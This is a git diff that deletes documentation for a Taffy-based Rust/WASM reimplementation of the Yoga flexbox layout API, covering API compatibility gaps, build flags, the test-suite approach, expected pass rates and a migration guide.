- -**Reference**: [Yoga Measure Function](https://yogalayout.dev/docs/api/node#measure-function) - -## Config API - -### Configuration Options - -| Method | Status | Notes | -|--------|--------|-------| -| `Config.create()` | ✅ | Factory method works | -| `free()` | ✅ | No-op (WASM GC) | -| `setUseWebDefaults(enabled)` | ⚠️ | Stored but doesn't affect Taffy | -| `useWebDefaults()` | ⚠️ | Returns stored value | -| `setPointScaleFactor(factor)` | ⚠️ | Stored but doesn't affect Taffy | -| `setExperimentalFeatureEnabled(feature, enabled)` | ⚠️ | No-op (Taffy has no experimental features) | -| `isExperimentalFeatureEnabled(feature)` | ⚠️ | Always returns false | -| `setErrata(errata)` | ⚠️ | No-op (Taffy has no errata flags) | -| `getErrata()` | ⚠️ | Always returns 0 | - -**Limitation**: Taffy doesn't have equivalent configuration options. These are provided for API compatibility but don't affect layout calculations. - -**Reference**: [Yoga Config API](https://yogalayout.dev/docs/api/config) - -## Enum Values - -All enum values match Yoga's numeric values for API compatibility. 
- -### Align - -```javascript -Align.Auto = 0 -Align.FlexStart = 1 -Align.Center = 2 -Align.FlexEnd = 3 -Align.Stretch = 4 -Align.Baseline = 5 -Align.SpaceBetween = 6 // ⚠️ Falls back to Start in alignItems/alignSelf -Align.SpaceAround = 7 // ⚠️ Falls back to Start in alignItems/alignSelf -Align.SpaceEvenly = 8 -``` - -**Reference**: [src/enums.mjs:10-20](src/enums.mjs#L10-L20) - -### FlexDirection - -```javascript -FlexDirection.Column = 0 -FlexDirection.ColumnReverse = 1 -FlexDirection.Row = 2 -FlexDirection.RowReverse = 3 -``` - -**Reference**: [src/enums.mjs:50-56](src/enums.mjs#L50-L56) - -### Justify - -```javascript -Justify.FlexStart = 0 -Justify.Center = 1 -Justify.FlexEnd = 2 -Justify.SpaceBetween = 3 -Justify.SpaceAround = 4 -Justify.SpaceEvenly = 5 -``` - -**Reference**: [src/enums.mjs:58-66](src/enums.mjs#L58-L66) - -### Wrap - -```javascript -Wrap.NoWrap = 0 -Wrap.Wrap = 1 -Wrap.WrapReverse = 2 -``` - -**Reference**: [src/enums.mjs:68-73](src/enums.mjs#L68-L73) - -## Known Differences from Yoga - -### 1. insertChild Index Behavior - -**Yoga**: Children can be inserted at specific indices, affecting layout order. - -**This Implementation**: Taffy's `add_child()` appends children to the end. The index parameter is tracked in the JavaScript adapter layer ([src/index.mjs:190-200](src/index.mjs#L190-L200)), but the underlying Taffy layout may not respect insertion order in all cases. - -**Impact**: Mostly cosmetic. Most applications insert children sequentially (0, 1, 2...) where this works correctly. - -**Workaround**: Remove and re-add children if order needs to change. - -### 2. Measure Functions - -**Yoga**: Supports custom measure functions for leaf nodes (used for text measurement, images, etc.). - -**This Implementation**: Measure functions are stored but not called during layout ([src/index.mjs:349-361](src/index.mjs#L349-L361)). - -**Impact**: Applications using measure functions (like Ink for text measurement) must pre-calculate sizes. 
- -**Workaround**: Calculate dimensions externally and set them with `setWidth()`/`setHeight()`. - -**Potential Solution**: Would require forking Taffy to add measure function support, or implementing a pre-layout measurement pass. - -### 3. Config Options - -**Yoga**: Config options affect layout calculations (web defaults, point scaling, errata). - -**This Implementation**: Config options are stored for API compatibility but don't affect Taffy's calculations. - -**Impact**: Minimal. Most applications don't use these options. Web defaults differences are subtle. - -### 4. Border Layout - -**Yoga**: Border is included in layout calculations. - -**This Implementation**: Taffy v0.6 doesn't include border in the layout model. - -**Impact**: Applications using border for spacing must use padding instead. - -**Workaround**: Convert border to padding: `setPadding(edge, borderWidth + paddingWidth)`. - -### 5. Absolute Positioning - -**Yoga**: Supports absolute positioning with `setPosition()` and `setPositionType(PositionType.Absolute)`. - -**This Implementation**: Absolute positioning not implemented. - -**Impact**: Applications using absolute positioning will not work correctly. - -**Status**: Could be implemented by mapping to Taffy's position support (future work). - -## Testing Against Yoga Suite - -We test compatibility using Yoga's official test suite as a submodule (v3.1.0): - -``` -.yoga-tests/javascript/tests/ -├── generated/ # ~900 generated tests -│ ├── YGFlexTest.test.ts -│ ├── YGPaddingTest.test.ts -│ ├── YGMarginTest.test.ts -│ └── ... -└── YG*.test.ts # ~50 manual tests -``` - -**Test Approach**: Tests are adapted to use our implementation's API. Tests that rely on unsupported features (border, absolute positioning, measure functions) are marked as expected failures. - -**Reference**: [TESTING.md](./TESTING.md) - -## Migration Guide - -### From Yoga C++ to This Implementation - -Most applications should work with minimal changes: - -#### 1. 
Import Change - -```javascript -// Before (Yoga C++) -import Yoga from 'yoga-layout' - -// After (Taffy-based) -import Yoga from '@socketsecurity/yoga-layout' -await Yoga.init() // Initialize WASM -``` - -#### 2. Measure Functions - -If your application uses measure functions: - -```javascript -// Before (Yoga C++) -node.setMeasureFunc((width, widthMode, height, heightMode) => { - const measured = measureText(text, width) - return { width: measured.width, height: measured.height } -}) - -// After (Taffy-based) - Pre-calculate and set explicitly -const measured = measureText(text, maxWidth) -node.setWidth(measured.width) -node.setHeight(measured.height) -``` - -#### 3. Border - -If your application uses border: - -```javascript -// Before (Yoga C++) -node.setBorder(Edge.All, 2) -node.setPadding(Edge.All, 10) - -// After (Taffy-based) - Combine into padding -node.setPadding(Edge.All, 12) // 2 (border) + 10 (padding) -``` - -### From Other Flexbox Implementations - -The API closely matches Yoga, which is widely used. 
Key differences from CSS flexbox: - -- Use method calls instead of CSS properties -- Use enum values instead of strings -- Must call `calculateLayout()` to trigger layout (not automatic) -- Read computed values with getters, not from style properties - -## Future Compatibility - -### Planned Improvements - -- [ ] Display property (Display.None for hiding elements) -- [ ] Aspect ratio support -- [ ] Gap (grid-gap) support -- [ ] Percentage-based sizing methods -- [ ] Auto-sizing methods -- [ ] Computed margin/padding getters - -### Requires Taffy Changes - -- [ ] Measure function integration -- [ ] Border in layout model -- [ ] Absolute positioning with positioning properties - -### Tracking Issues - -Track compatibility issues and feature requests: -- Implementation: [src/lib.rs](src/lib.rs) -- Adapter layer: [src/index.mjs](src/index.mjs) -- Tests: `.yoga-tests/` - -## References - -- **Yoga Layout API**: https://yogalayout.dev/docs/api -- **Taffy Documentation**: https://github.com/DioxusLabs/taffy -- **W3C Flexbox Spec**: https://www.w3.org/TR/css-flexbox-1/ -- **Our Implementation**: [src/lib.rs](src/lib.rs), [src/index.mjs](src/index.mjs) diff --git a/docs/yoga-layout/research/taffy-research.md b/docs/yoga-layout/research/taffy-research.md deleted file mode 100644 index fc0e6ce25..000000000 --- a/docs/yoga-layout/research/taffy-research.md +++ /dev/null @@ -1,483 +0,0 @@ -# Yoga Layout WASM - -**⚠️ STATUS: Research & Prototyping - Using Official Yoga C++ with Emscripten** - -This package builds Yoga Layout from the official C++ implementation using Emscripten, optimized for Socket CLI's terminal rendering needs. - -## Previous Research: Taffy-based Implementation - -We explored building a pure Rust implementation using [Taffy](https://github.com/DioxusLabs/taffy) to avoid C++ toolchain dependencies. 
While promising, we discovered critical blockers: - -- **Measure functions**: Required by Ink for text measurement, not supported by Taffy -- **Border layout**: Ink uses borders extensively, Taffy v0.6 doesn't include border in layout calculations - -**Decision**: Use official Yoga C++ with Emscripten for 100% compatibility with Ink and other Yoga consumers. - -**Research artifacts preserved**: See [TAFFY-RESEARCH.md](./TAFFY-RESEARCH.md) for the Taffy exploration, architecture, and compatibility analysis. - -## Table of Contents - -- [Why This Exists](#why-this-exists) -- [Architecture](#architecture) -- [Installation](#installation) -- [Usage](#usage) -- [API Compatibility](#api-compatibility) -- [Build System](#build-system) -- [Testing](#testing) -- [Performance](#performance) -- [Limitations](#limitations) -- [References](#references) - -## Why This Exists - -### Problem - -The original Yoga Layout requires: -- C++ toolchain (clang++) -- Emscripten SDK for WASM compilation -- Complex build dependencies -- Platform-specific binaries - -This creates friction for: -- CI/CD environments -- Cross-platform development -- Dependency management -- Build reproducibility - -### Solution - -This package replaces Yoga's C++ implementation with: -- **Taffy v0.6.0**: Pure Rust flexbox layout engine -- **wasm-bindgen**: Minimal JavaScript interop layer -- **No C++ toolchain**: Only Rust required -- **Smaller footprint**: ~237KB total (230KB WASM + 7KB JS) - -### Inspiration - -This approach mirrors Socket's successful use of pure Rust for other WASM modules: -- **Acorn parser**: Pure Rust alternative to C++ Acorn -- **Custom Node.js builds**: Rust-based patches and optimizations - -## Architecture - -``` -┌─────────────────────────────────────────────────────────────┐ -│ Application Layer │ -│ (Ink, or other Yoga users) │ -└─────────────────────┬───────────────────────────────────────┘ - │ - │ Yoga API (compatible) - │ 
-┌─────────────────────▼───────────────────────────────────────┐ -│ JavaScript Adapter Layer │ -│ (src/index.mjs) │ -│ │ -│ - Provides full Yoga API compatibility │ -│ - Handles tree management (parent/child tracking) │ -│ - Implements measure functions (stubs) │ -│ - Manages dirty tracking │ -└─────────────────────┬───────────────────────────────────────┘ - │ - │ wasm-bindgen bindings - │ -┌─────────────────────▼───────────────────────────────────────┐ -│ WASM Layer │ -│ (build/wasm/yoga.wasm) │ -│ │ -│ - Generated by wasm-bindgen from Rust │ -│ - Exports core layout methods │ -│ - ~230KB optimized with wasm-opt │ -└─────────────────────┬───────────────────────────────────────┘ - │ - │ Rust FFI - │ -┌─────────────────────▼───────────────────────────────────────┐ -│ Rust Core Layer │ -│ (src/lib.rs) │ -│ │ -│ - YogaNode wrapper around Taffy │ -│ - Maps Yoga API to Taffy types │ -│ - Handles enum conversions │ -└─────────────────────┬───────────────────────────────────────┘ - │ - │ Taffy API - │ -┌─────────────────────▼───────────────────────────────────────┐ -│ Taffy Layout Engine │ -│ (taffy v0.6.0) │ -│ │ -│ - Pure Rust flexbox implementation │ -│ - W3C spec compliant │ -│ - Zero C++ dependencies │ -└─────────────────────────────────────────────────────────────┘ -``` - -### Layer Responsibilities - -1. **Application Layer**: Uses Yoga API without modification -2. **JavaScript Adapter**: Fills gaps in WASM bindings (tree management, callbacks) -3. **WASM Layer**: Fast compiled layout calculations -4. **Rust Core**: Translates Yoga API to Taffy types -5. 
**Taffy Engine**: Core flexbox algorithm implementation - -## Installation - -### Prerequisites - -- **Rust 1.70+**: [Install Rust](https://www.rust-lang.org/tools/install) -- **wasm-opt**: [Install Binaryen](https://github.com/WebAssembly/binaryen) -- **Node.js 18+**: For building and testing - -### Building from Source - -```bash -# Install Rust target for WASM -rustup target add wasm32-unknown-unknown - -# Build WASM module -node scripts/build.mjs - -# Output will be in build/wasm/ -# - yoga.wasm (~230KB) -# - yoga.js (~7KB) -``` - -### Build Options - -```bash -# Force rebuild (ignore checkpoints) -node scripts/build.mjs --force - -# The build process includes: -# 1. Rust compilation with release-wasm-fast profile -# 2. wasm-bindgen JavaScript binding generation -# 3. wasm-opt aggressive size optimization -# 4. WASM validation and verification -``` - -## Usage - -### Basic Example - -```javascript -import Yoga from '@socketsecurity/yoga-layout' - -// Initialize WASM module -await Yoga.init() - -// Create root node -const root = Yoga.Node.create() -root.setWidth(500) -root.setHeight(300) -root.setFlexDirection(Yoga.FlexDirection.Row) - -// Create child nodes -const child1 = Yoga.Node.create() -child1.setFlexGrow(1) - -const child2 = Yoga.Node.create() -child2.setFlexGrow(2) - -root.insertChild(child1, 0) -root.insertChild(child2, 1) - -// Calculate layout -root.calculateLayout(undefined, undefined, Yoga.DIRECTION_LTR) - -// Read computed layout -console.log(child1.getComputedWidth()) // 166.67 -console.log(child2.getComputedWidth()) // 333.33 -``` - -### With Ink (React for CLIs) - -```javascript -import Yoga from '@socketsecurity/yoga-layout' -import { render } from 'ink' - -// Ink will automatically use Yoga for layout calculations -const { unmount } = render() -``` - -### Configuration - -```javascript -// Create config (optional) -const config = Yoga.Config.create() -config.setUseWebDefaults(true) - -// Create node with config -const node = 
Yoga.Node.create(config) -``` - -## API Compatibility - -This implementation aims for Yoga API compatibility while leveraging Taffy's pure Rust implementation. - -### ✅ Fully Supported - -- **Layout calculation**: `calculateLayout()`, all layout getters -- **Flex properties**: flexDirection, flexGrow, flexShrink, flexBasis, flexWrap -- **Alignment**: justifyContent, alignItems, alignContent, alignSelf -- **Sizing**: width, height, minWidth, minHeight, maxWidth, maxHeight -- **Spacing**: margin, padding (all edges) -- **Tree management**: insertChild, removeChild, getChild, getChildCount - -### ⚠️ Partial Support - -- **insertChild index**: Taffy appends children; index parameter tracked but may not affect layout order -- **Config options**: Stored but don't affect Taffy calculations (useWebDefaults, pointScaleFactor) -- **Experimental features**: No-op (Taffy doesn't have feature flags) - -### ❌ Not Supported - -- **Measure functions**: Stored but not integrated with layout (Taffy limitation) -- **Border**: Taffy v0.6 doesn't support border in layout calculations -- **Position**: Absolute positioning not yet implemented -- **Aspect ratio**: Not implemented in current wrapper -- **Gap (grid-gap)**: Not implemented in current wrapper - -See [API_COMPATIBILITY.md](./API_COMPATIBILITY.md) for detailed compatibility matrix. 
- -## Build System - -### Cargo Profile - -We use a custom `release-wasm-fast` profile optimized for WASM size: - -```toml -[profile.release-wasm-fast] -inherits = "release" -opt-level = "z" # Optimize for size -lto = "thin" # Thin LTO for faster builds -codegen-units = 1 # Single unit for better optimization -strip = true # Strip symbols -panic = "abort" # No unwinding (smaller code) -overflow-checks = false # Remove overflow checks -debug-assertions = false # Remove debug assertions -``` - -### RUSTFLAGS - -We enable modern WASM features for better performance: - -```bash -RUSTFLAGS=" - -C target-feature=+simd128 # SIMD (20-30% perf boost) - -C target-feature=+bulk-memory # Bulk memory operations - -C target-feature=+mutable-globals # Mutable globals - -C target-feature=+sign-ext # Sign extension - -C target-feature=+nontrapping-fptoint # Non-trapping float-to-int - -C target-feature=+reference-types # Reference types - -C overflow-checks=off # Disable overflow checks - -C debug-assertions=off # Disable debug assertions -" -``` - -**Note**: These flags require modern runtimes: -- Chrome 91+ -- Firefox 89+ -- Node.js 16+ -- Safari 15+ - -### wasm-opt Flags - -Aggressive optimization with wasm-opt (Binaryen): - -```bash -wasm-opt -Oz \ - --enable-simd \ - --enable-bulk-memory \ - --enable-sign-ext \ - --enable-mutable-globals \ - --enable-nontrapping-float-to-int \ - --enable-reference-types \ - --low-memory-unused \ - --flatten \ - --rereloop \ - --vacuum \ - --dce \ - --remove-unused-names \ - --remove-unused-module-elements \ - --strip-debug \ - --strip-dwarf \ - --strip-producers \ - --strip-target-features -``` - -### Build Phases - -1. **Rust compilation**: `cargo build --target wasm32-unknown-unknown --profile release-wasm-fast` -2. **JavaScript bindings**: `wasm-bindgen --target nodejs --out-dir build/pkg` -3. **Optimization**: `wasm-opt` with aggressive flags -4. **Verification**: Validate WASM magic number and size -5. 
**Export**: Copy to `build/wasm/` for distribution - -## Testing - -### Test Suite Approach - -We test against Yoga's official test suite using a submodule approach: - -``` -.yoga-tests/ # Git submodule (Yoga v3.1.0) -├── javascript/ -│ └── tests/ -│ ├── generated/ # Generated Yoga tests -│ │ ├── YGFlexTest.test.ts -│ │ ├── YGPaddingTest.test.ts -│ │ └── ... -│ └── YG*.test.ts # Manual Yoga tests -``` - -This mirrors Socket's testing approach: -- **Acorn**: Tests against test262 suite via submodule -- **Babel transforms**: Tests against Babel's unit tests via submodule - -### Running Tests - -```bash -# Run Yoga compatibility tests -npm test - -# Run specific test file -npm test -- YGFlexTest - -# Update test snapshots -npm test -- --update-snapshots -``` - -See [TESTING.md](./TESTING.md) for detailed testing documentation. - -## Performance - -### Size Comparison - -| Implementation | WASM Size | JS Size | Total | -|---------------|-----------|---------|-------| -| **Taffy (this)** | 230 KB | 7 KB | **237 KB** | -| Yoga (Emscripten) | 65 KB | 46 KB | 111 KB | - -**Trade-offs**: -- Taffy is 2.1x larger but eliminates C++ toolchain -- Larger WASM, smaller JS glue code -- No platform-specific binaries needed -- Reproducible builds across environments - -### Runtime Performance - -Taffy is designed for high performance: -- Pure Rust (no FFI overhead) -- SIMD optimizations -- Modern WASM features (bulk-memory, reference-types) -- Efficient memory layout - -Benchmarks TBD (see [TESTING.md](./TESTING.md)). - -## Limitations - -### Current Known Limitations - -1. **insertChild index behavior**: Taffy's `add_child()` appends children. The index parameter is tracked in the adapter layer but may not affect layout order in all cases. - -2. **Measure functions**: Yoga allows custom measure functions for leaf nodes. Taffy doesn't support this pattern directly. Measure functions are stored but not integrated with layout calculations. - -3. 
**Config options**: Yoga's config options (pointScaleFactor, experimentalFeatures, errata) are stored for API compatibility but don't affect Taffy's layout calculations. - -4. **Missing layout features** (can be added with additional Rust code): - - Border (Taffy v0.6 limitation) - - Absolute positioning - - Aspect ratio - - Gap (grid-gap) - - Display: none - -### Future Improvements - -- [ ] Implement measure function integration (may require Taffy fork) -- [ ] Add missing layout features (border, position, aspect ratio) -- [ ] Performance benchmarking suite -- [ ] Full Yoga test suite compatibility -- [ ] TypeScript type definitions -- [ ] Browser WASM target (currently Node.js only) - -## References - -### Documentation - -- **Yoga Layout**: https://yogalayout.dev/ - - Official documentation - - API reference - - Layout examples - -- **Taffy**: https://github.com/DioxusLabs/taffy - - Pure Rust flexbox engine - - W3C spec compliant - - Used by Dioxus UI framework - -- **Ink**: https://github.com/vadimdemedes/ink - - React for CLIs - - Primary use case for this package - -### Technical Resources - -- **WASM Bindgen**: https://rustwasm.github.io/wasm-bindgen/ - - Rust ↔ JavaScript interop - - WASM module generation - -- **Binaryen**: https://github.com/WebAssembly/binaryen - - wasm-opt optimizer - - WASM validation tools - -- **W3C Flexbox Spec**: https://www.w3.org/TR/css-flexbox-1/ - - Flexbox specification - - Layout algorithm details - -### Socket Implementation References - -- **Acorn WASM**: `../ultrathink/acorn/` - - Pure Rust parser - - WASM build patterns - - test262 test suite integration - -- **Socket CLI Build Infrastructure**: `@socketsecurity/build-infra` - - Shared build utilities - - Checkpoint system - - Environment setup - -### Related Projects - -- **yoga-wasm-web**: https://github.com/DioxusLabs/yoga-wasm-web - - Alternative WASM Yoga binding - - Uses original C++ Yoga with Emscripten - -- **stretch**: https://github.com/vislyhq/stretch - - 
Previous pure Rust flexbox engine - - Deprecated in favor of Taffy - -## Contributing - -This package is part of Socket CLI. For contribution guidelines, see the main [Socket CLI repository](https://github.com/SocketDev/socket-cli). - -### Development Workflow - -```bash -# Install dependencies -pnpm install - -# Build WASM -node scripts/build.mjs - -# Run tests -npm test - -# Force rebuild -node scripts/build.mjs --force -``` - -## License - -MIT License - Copyright (c) Socket Security - -This package uses: -- Taffy (MIT License) -- Yoga test suite (MIT License, Meta Platforms) diff --git a/docs/yoga-layout/research/testing.md b/docs/yoga-layout/research/testing.md deleted file mode 100644 index 4a4308039..000000000 --- a/docs/yoga-layout/research/testing.md +++ /dev/null @@ -1,567 +0,0 @@ -# Testing Yoga Layout (Taffy-based) - -This document explains the testing strategy for verifying Yoga API compatibility using Taffy as the underlying layout engine. - -## Table of Contents - -- [Overview](#overview) -- [Test Suite Structure](#test-suite-structure) -- [Running Tests](#running-tests) -- [Test Approach](#test-approach) -- [Expected Failures](#expected-failures) -- [Adding New Tests](#adding-new-tests) -- [Benchmarking](#benchmarking) -- [References](#references) - -## Overview - -We validate Yoga API compatibility by running Yoga's official test suite against our Taffy-based implementation. This approach mirrors Socket's testing strategy for other projects: - -- **Acorn**: Tests against ECMAScript test262 suite via submodule -- **Babel transforms**: Tests against Babel's unit tests via submodule - -### Why This Approach? - -1. **Authoritative**: Uses Yoga's official tests (same tests Facebook uses) -2. **Comprehensive**: ~950 tests covering all layout scenarios -3. **Continuous validation**: Ensures compatibility as we add features -4. 
**Regression detection**: Catches breaking changes immediately - -## Test Suite Structure - -### Yoga Test Submodule - -We use Yoga v3.1.0's JavaScript test suite as a submodule: - -``` -.yoga-tests/ # Git submodule -├── .git/ # Submodule metadata -├── javascript/ -│ ├── package.json # Yoga package.json -│ ├── src/ -│ │ ├── index.ts # Yoga entry point -│ │ ├── wrapAssembly.ts # WASM wrapper -│ │ └── generated/ -│ │ └── YGEnums.ts # Enum definitions -│ └── tests/ -│ ├── generated/ # Generated from HTML fixtures -│ │ ├── YGAbsolutePositionTest.test.ts -│ │ ├── YGAlignContentTest.test.ts -│ │ ├── YGAlignItemsTest.test.ts -│ │ ├── YGAlignSelfTest.test.ts -│ │ ├── YGAspectRatioTest.test.ts -│ │ ├── YGBorderTest.test.ts -│ │ ├── YGDimensionTest.test.ts -│ │ ├── YGDisplayTest.test.ts -│ │ ├── YGFlexDirectionTest.test.ts -│ │ ├── YGFlexTest.test.ts -│ │ ├── YGFlexWrapTest.test.ts -│ │ ├── YGGapTest.test.ts -│ │ ├── YGJustifyContentTest.test.ts -│ │ ├── YGMarginTest.test.ts -│ │ ├── YGMinMaxDimensionTest.test.ts -│ │ ├── YGPaddingTest.test.ts -│ │ ├── YGPercentageTest.test.ts -│ │ ├── YGRoundingTest.test.ts -│ │ ├── YGSizeOverflowTest.test.ts -│ │ └── YGStaticPositionTest.test.ts -│ ├── YGAlignBaselineTest.test.ts -│ ├── YGComputedBorderTest.test.ts -│ ├── YGComputedMarginTest.test.ts -│ ├── YGComputedPaddingTest.test.ts -│ ├── YGDirtiedTest.test.ts -│ ├── YGErrataTest.test.ts -│ ├── YGFlexBasisAuto.test.ts -│ ├── YGHasNewLayout.test.ts -│ ├── YGMeasureCacheTest.test.ts -│ ├── YGMeasureTest.test.ts -│ └── Benchmarks/ -│ └── YGBenchmark.test.ts -``` - -**Submodule Details**: -- **Repository**: https://github.com/facebook/yoga -- **Version**: v3.1.0 (tag) -- **Cloned to**: `.yoga-tests/` -- **Test count**: ~950 tests total - -### Our Test Runner - -``` -tests/ -├── yoga-compat.test.mjs # Main test runner -├── adapters/ -│ ├── yoga-to-taffy.mjs # Import adapter for our implementation -│ └── test-helpers.mjs # Common test utilities -└── snapshots/ # Test snapshots (expected vs 
actual) - ├── flex.snap - ├── padding.snap - └── ... -``` - -## Running Tests - -### Prerequisites - -```bash -# Install dependencies -pnpm install - -# Build WASM module -node scripts/build.mjs -``` - -### Basic Test Commands - -```bash -# Run all Yoga compatibility tests -npm test - -# Run specific test file -npm test -- --grep "YGFlexTest" - -# Run with verbose output -npm test -- --reporter=verbose - -# Update snapshots -npm test -- --update-snapshots -``` - -### Test Categories - -```bash -# Flex properties only -npm test -- --grep "Flex" - -# Padding and margin -npm test -- --grep "Padding|Margin" - -# Alignment tests -npm test -- --grep "Align" - -# Exclude known failures -npm test -- --grep "Flex" --invert --grep "Position|Border|Measure" -``` - -## Test Approach - -### 1. Import Adaptation - -Yoga tests import from `'yoga-layout'`. We use import remapping to substitute our implementation: - -```javascript -// tests/adapters/yoga-to-taffy.mjs -import Yoga from '../../src/index.mjs' - -// Initialize WASM -await Yoga.init() - -// Re-export with same interface -export default Yoga -export * from '../../src/enums.mjs' -``` - -### 2. Test Execution Pattern - -Each test follows this pattern: - -```javascript -test('flex_basis_flex_grow_column', () => { - const config = Yoga.Config.create() - let root - - try { - // Create node tree - root = Yoga.Node.create(config) - root.setWidth(100) - root.setHeight(100) - - const child = Yoga.Node.create(config) - child.setFlexGrow(1) - child.setFlexBasis(50) - root.insertChild(child, 0) - - // Calculate layout - root.calculateLayout(undefined, undefined, Direction.LTR) - - // Assert computed values - expect(root.getComputedWidth()).toBe(100) - expect(root.getComputedHeight()).toBe(100) - expect(child.getComputedTop()).toBe(0) - expect(child.getComputedHeight()).toBe(100) - } finally { - // Cleanup - root?.freeRecursive() - config?.free() - } -}) -``` - -### 3. 
Comparison Strategy - -We compare our implementation's output against expected values from Yoga: - -1. **Exact match**: Computed layout values should match within floating-point epsilon (0.001) -2. **Snapshot testing**: Store expected layouts and compare against actual -3. **Visual diffing**: Generate HTML visualizations for debugging - -### 4. Handling Floating Point - -Layout calculations involve floating-point arithmetic. We use epsilon comparison: - -```javascript -function expectClose(actual, expected, epsilon = 0.001) { - expect(Math.abs(actual - expected)).toBeLessThan(epsilon) -} -``` - -## Expected Failures - -### Known Unsupported Features - -Some tests will fail due to Taffy limitations. We track these as expected failures: - -#### 1. Border Tests (`YGBorderTest`) - -**Reason**: Taffy v0.6 doesn't include border in layout calculations. - -**Test Count**: ~50 tests - -**Status**: ❌ Expected failures - -**Workaround**: Convert border to padding in application code. - -**Example**: -```javascript -test.skip('border_flex_child', () => { - // Skipped: Taffy doesn't support border -}) -``` - -#### 2. Absolute Position Tests (`YGAbsolutePositionTest`) - -**Reason**: Absolute positioning not implemented in current wrapper. - -**Test Count**: ~80 tests - -**Status**: ❌ Expected failures - -**Future**: Could be implemented by mapping to Taffy's position support. - -**Example**: -```javascript -test.skip('absolute_layout_width_height_start_top', () => { - // Skipped: Absolute positioning not supported -}) -``` - -#### 3. Measure Function Tests (`YGMeasureTest`) - -**Reason**: Taffy doesn't provide measure function extension points. - -**Test Count**: ~30 tests - -**Status**: ⚠️ Partial failures - -**Workaround**: Pre-calculate sizes and set explicitly. - -**Example**: -```javascript -test.skip('measure_flex_child', () => { - // Skipped: Measure functions not integrated with layout -}) -``` - -#### 4. 
Aspect Ratio Tests (`YGAspectRatioTest`) - -**Reason**: Not yet implemented in wrapper. - -**Test Count**: ~40 tests - -**Status**: 🚧 Planned - -**Example**: -```javascript -test.skip('aspect_ratio_flex_grow', () => { - // Skipped: Aspect ratio not implemented -}) -``` - -#### 5. Gap Tests (`YGGapTest`) - -**Reason**: Not yet implemented in wrapper. - -**Test Count**: ~25 tests - -**Status**: 🚧 Planned - -**Example**: -```javascript -test.skip('gap_column', () => { - // Skipped: Gap not implemented -}) -``` - -### Expected Pass Rate - -| Category | Total Tests | Expected Passes | Pass Rate | -|----------|-------------|-----------------|-----------| -| Flex properties | ~200 | ~195 | 97.5% | -| Alignment | ~150 | ~145 | 96.7% | -| Sizing | ~180 | ~175 | 97.2% | -| Spacing (padding/margin) | ~140 | ~140 | 100% | -| Border | ~50 | ~0 | 0% (unsupported) | -| Position | ~80 | ~0 | 0% (unsupported) | -| Measure | ~30 | ~5 | 16.7% (partial) | -| Aspect Ratio | ~40 | ~0 | 0% (not implemented) | -| Gap | ~25 | ~0 | 0% (not implemented) | -| Other | ~55 | ~50 | 90.9% | -| **Total** | **~950** | **~710** | **74.7%** | - -## Adding New Tests - -### 1. Add Test to Our Suite - -Create a new test file in `tests/`: - -```javascript -// tests/custom-layout.test.mjs -import { test } from 'node:test' -import { strict as assert } from 'node:assert' -import Yoga from '../src/index.mjs' - -await Yoga.init() - -test('custom layout scenario', () => { - const root = Yoga.Node.create() - root.setFlexDirection(Yoga.FlexDirection.Row) - // ... test implementation -}) -``` - -### 2. Add Snapshot Test - -Generate expected layout snapshot: - -```javascript -test('flex layout snapshot', () => { - const layout = computeLayout(root) - expect(layout).toMatchSnapshot() -}) -``` - -### 3. Visual Testing - -Generate HTML visualization for manual verification: - -```javascript -function generateHTML(node, depth = 0) { - const layout = node.getComputedLayout() - return ` -

- ` -} -``` - -## Benchmarking - -### Layout Performance - -Benchmark layout calculation performance: - -```javascript -// tests/benchmarks/layout-perf.mjs -import { performance } from 'node:perf_hooks' -import Yoga from '../../src/index.mjs' - -await Yoga.init() - -function benchmarkLayout(nodeCount) { - const root = createComplexTree(nodeCount) - - const start = performance.now() - root.calculateLayout(1000, 1000, Yoga.DIRECTION_LTR) - const end = performance.now() - - return end - start -} - -// Run benchmark -console.log('Layout performance (1000 nodes):', benchmarkLayout(1000), 'ms') -``` - -### Comparing with Yoga - -Compare our performance against official Yoga: - -```bash -# Benchmark our implementation -npm run benchmark - -# Compare against Yoga C++ -cd .yoga-tests/javascript -npm run benchmark -``` - -### Expected Performance - -Taffy is designed for high performance: -- **Pure Rust**: No FFI overhead -- **SIMD**: 20-30% performance boost on modern CPUs -- **Efficient algorithm**: O(n) layout calculation - -Target performance: Within 10% of Yoga C++ for common layouts. - -## Debugging Failed Tests - -### 1. Visual Debugging - -Generate HTML visualization: - -```bash -npm run test:visual -- YGFlexTest -``` - -Opens browser with side-by-side comparison: -- Left: Expected layout (Yoga C++) -- Right: Actual layout (our implementation) - -### 2. Verbose Output - -Run test with detailed logging: - -```bash -DEBUG=yoga:* npm test -- --reporter=verbose -``` - -### 3. Single Test Isolation - -Run single test in isolation: - -```javascript -test.only('specific_flex_scenario', () => { - // ... test implementation -}) -``` - -### 4. 
Layout Diffing - -Compare computed layouts: - -```javascript -function diffLayouts(expected, actual) { - console.log('Expected:', JSON.stringify(expected, null, 2)) - console.log('Actual:', JSON.stringify(actual, null, 2)) - console.log('Diff:', { - left: actual.left - expected.left, - top: actual.top - expected.top, - width: actual.width - expected.width, - height: actual.height - expected.height, - }) -} -``` - -## Continuous Integration - -### GitHub Actions - -Run tests in CI: - -```yaml -# .github/workflows/test.yml -name: Test - -on: [push, pull_request] - -jobs: - test: - runs-on: ubuntu-latest - steps: - - uses: actions/checkout@v4 - with: - submodules: recursive # Clone .yoga-tests/ - - - name: Setup Rust - uses: actions-rust-lang/setup-rust-toolchain@v1 - with: - toolchain: stable - target: wasm32-unknown-unknown - - - name: Setup Node - uses: actions/setup-node@v4 - with: - node-version: 20 - - - name: Install dependencies - run: pnpm install - - - name: Build WASM - run: node scripts/build.mjs - - - name: Run tests - run: npm test -``` - -### Coverage Reporting - -Generate coverage report: - -```bash -npm run test:coverage -``` - -## References - -### Test Resources - -- **Yoga Test Suite**: https://github.com/facebook/yoga/tree/main/javascript/tests -- **Yoga Test Generator**: https://github.com/facebook/yoga/tree/main/gentest -- **W3C Flexbox Tests**: https://github.com/web-platform-tests/wpt/tree/master/css/css-flexbox - -### Related Testing Approaches - -- **Acorn test262 integration**: `../ultrathink/acorn/tests/` -- **Socket CLI test patterns**: `../../packages/cli/test/` -- **Vitest documentation**: https://vitest.dev/ - -### Tools - -- **Vitest**: https://vitest.dev/ (fast test runner) -- **Node.js Test Runner**: https://nodejs.org/api/test.html (built-in alternative) -- **Snapshot Testing**: https://vitest.dev/guide/snapshot.html - -## Contributing - -### Adding Test Coverage - -1. Identify untested Yoga API surface -2. 
